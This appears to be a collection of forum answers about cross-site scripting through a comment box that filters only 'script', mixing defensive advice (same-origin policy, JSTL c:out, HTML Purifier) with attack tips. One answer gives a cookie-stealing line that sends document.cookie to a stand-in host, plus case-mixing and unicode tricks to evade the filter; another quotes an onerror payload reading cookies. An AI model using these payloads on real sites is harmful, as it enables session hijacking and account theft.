You made it sound like you are trying to use the cookie as a payload for the XSS?

Are you in fact trying to steal the cookie?

But if the site is allowing you to insert comments and only removing "script" then you have a bunch of alternatives for inserting XSS including coookie stealing script.

Try this

javascript:img=new Image();img.src="http://yoursite.com?cookie="+document.cookie;

but you want to encode the word script so you can instead you can try

ScRiPt

or unicode 73 63 72 69 70 74

Cookies follow same origin policy. So if the attack website and the victim website(which allows iframes to open) are having the same host then the popup on running document.cookie will conatin the cookies info. Since in your case they seem to be of diff domains cookie stealing will not be possible. To prevent XSS better way is to use C:out tag of the core jstl library

As far as I know, an iframe cannot access to the original website if the domain of iframe and the domain of original website are different, but there are other problems. (ex. cracker commenting <img src="asdf" onerror="alert(document.cookie)"/>)

You may want to use somethings like HTML Purifier....

Both the surrounding page need to come from the same domain. This is limited by the Same Origin Policy, which states that a script in one frame may only access data in another frame given they are on the same protocol, have the exact same domain name and are running on the same port. It can be slightly relaxed by setting document.domain to the top level domain in both frames, and thus allowing frames from subdomain to communicate.

You could though try to input , though that may be blocked in newer browsers.

Limiting script is however not enough to stop XSS. There are many many other ways. See http://html5sec.org and http://ha.ckers.org/xss.html